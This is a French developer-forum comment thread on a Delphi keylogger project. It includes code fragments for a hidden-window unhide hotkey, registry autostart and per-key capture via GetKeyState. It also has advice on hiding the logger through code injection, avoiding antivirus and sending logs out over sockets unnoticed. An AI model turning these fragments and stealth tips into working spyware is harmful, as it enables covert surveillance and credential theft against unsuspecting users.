NMB KEYLOGGER

Commentaire de f0xi le 21/12/2006 11:52:07 administrateur CS

if not Visible then begin
   case VirtualKey of
    {Ctrl}
    17: ShortcutState[0] := (KeyStore and $80000000) = 0;
    {n}
78: ShortcutState[1] := (KeyStore and $80000000) = 0;
   end;
   if ShortcutState[0] and ShortcutState[1] and ((KeyStore and $20000000)<> 0) then begin
      ShortcutState[0]:= False;
      ShortcutState[1]:= False;
      self.Visible:= True;
   end;
end;



if Ini.ReadBool('Config','ShowMsg2',True) then begin
   IsChecked := False;
   TheModalResult := MDChecked(Msg2,'Ne plus afficher ce message',IsChecked,mtInformation,[mbOk]);
   if IsChecked then
      Ini.WriteBool('Config','ShowMsg2',False);
end;



Registre := TRegistry.Create;
try
  Registre.RootKey := HKEY_LOCAL_MACHINE;
  if Registre.OpenKey(RunKey, False) then
     ChbReRun.Checked := Registre.ReadString(KeyName) = '"'+ParamStr(0)+'" '+'"Ghost"';
  Registre.CloseKey;
finally
  Registre.Free;
end;

Commentaire de jace1975 le 21/12/2006 18:50:43

Déjà vu ce genre de code plein de fois, et je me suis toujours demander l'interet de faire une dll pour un hook claivier.

Peux-tu donc  m'expliquer l'interet de la dll par rapport à un hook directement implémente dans ton application?

tschussss

Commentaire de N_M_B le 22/12/2006 14:06:33

bonjour a tous ! désolé du retard mais je n'ai pas payé mon abonement internet sa sera pour samedi ,
@ f0xi : oui bien vue merci !
@ jace1975 : enfaite normalement et comme il a été dit pas microsoft on ne peut implémenter un hook sans dll(la dll est chargé en tant que module dans chaque process a éspioner) , mais ils ont mentis apparament car sur cppfrance.com il a été  implémenté in hook clavier sans dll, on delphi je ne sais pas trop si c possible vu que je ne fait pas de c/c++ !

@ DelphiCool:   "récuperer des numéro de carte bleu" ca n'est pas mon but et en plus en algerie on utilise pas de cartes banquaires!
mon but n'est pas d'éspioner un utilisateur m'ais juste la satisfaction d'utiliser des thequniques de programmation nouvelles pour moi , et d'ameliorer mon niveau !

@ tous : d'ès que je rétablie ma connection je met a jour !
a+ bon code

Commentaire de DelphiCool le 22/12/2006 15:05:32 administrateur CS

NMB, je n'ai jamais dit que tu recupère les numéros de CB.
J'ai dit que ça peut servir à ça et que là c'est dangereux.

Pour Hooker sans dll, il te faut :
- mettre le code dans ton application
- Mettre les exports.
- Charger dynamiquement ton application comme si c'etait la dll

Commentaire de askil2000 le 02/01/2007 16:12:20

interessant, mais détectable par tout les antivirus. j'ai réalisé un keylogger sans dll, trés simple à faire en delphi, maintenant pour qu'il soit invisible (dans les process)c'est une autre histoire ... il faut se renseigner sur l'injection de code :o)

Commentaire de N_M_B le 03/01/2007 02:34:26

les gars si vous pouviez me montrer vos keyloggers je vous en serais reconaissant , sourtout dans le cas d'interprétations des touches et le fait qu'il marche sans dll en tout cas si vous etes d'accord faites le moi savoir pas MP  merci :)

l'injection de code hé oui je voulais  k'il soit invisible dans la listede process alors je me suis un peut documenté et je suis tombé sur ce mot 'l'injection de code' loool sa ma stopé sec !!!

lol alé encore bonne année et bon code a+
N_M_B

Commentaire de jace1975 le 10/01/2007 19:02:25

Taye 78 : tu es aller voir le code de whitehippo??

Commentaire de askil2000 le 13/01/2007 15:24:53

Salut tlm !
DelphiCool : J'avoue ne pas l'avoir testé sur d'autres OS que XP ou 2000, d'ailleur je n'ai pas Win9x ni Millenium sous la main. Le principe de mon keylogger repose en effet comme la sous entendu Taye78 sur les GetKeyState il y a un exemple sur ce site.

j'ai procédé de la façon suivante :

if ((Copy(IntToStr(GetKeyState(65)),1,1) = '-') and (SHIFT.Visible = True) and (CAPS.Visible = True) and (ALT.Visible = False) and (ALTGR.Visible = False) and (CTRL.Visible = False)) or ((Copy(IntToStr(GetKeyState(65)),1,1) = '-') and (SHIFT.visible = False) and (CAPS.Visible = False) and (ALT.Visible = False) and (ALTGR.Visible = False) and (CTRL.Visible = False)) then EdtTouche.Text := 'a' else etc..

traduction de chaque touche du clavier.

un bon conseil si vous voulez faire un keylogger en delphi qui tienne la route utilisé les clients sockets pour la transmition,
car le TWebBrowser vous trahira par l'effet sonor du changement de page :d

@+ tlm ...

Commentaire de taye78 le 13/01/2007 19:00:14

oui sans DLL enfait au lieu de load une dll cest le module courrant (l'exe) qui est loade et mappe ds chaque process par windows

Commentaire de N_M_B le 13/01/2007 21:44:52

bien dit DelphiCool

Commentaire de Loda le 03/02/2007 19:33:16

salut,

très bon code, bien présenté, agréable à lire, bien documenté et clair! beau boulot!

j'ai pris quelques notes lorsque je l'ai lue. Deux-trois trucs que tu peux améliorer. Les voici:


procedure TForm1.SetActive(Active: boolean);
begin
[...]
  Actif:= Active; // me semble faux, tu affect la var à elle-même. utilise self.active. ou renomme le parametre par "value" ou "aActif".

end;

une var inutilisée dans ChbReRunClick

  else MessageDlg(Msg1,mtError,[mbOk],0); //msg1= 'Le log n''éxiste pas'
si tu nomme tes const (genre MSG_NoLogFile) ça évite ce genre de commentaire et rend le code plus clair. ;)


const Msg5 pas utilisé.

aussi, essai de nommer tout les boutons (et autre compo), même somairement.

pour les trucs genre TRegistry. Utilise un "with TRegistry.Create do try finally" ça rend le code plus facile à lire et évite de décalarer une var local.

sinon, c'est parfait.

bonne continuation.

Commentaire de Justepourlelogieciel le 20/09/2008 12:46:48

comment on le fait fonctionner le logiciel ?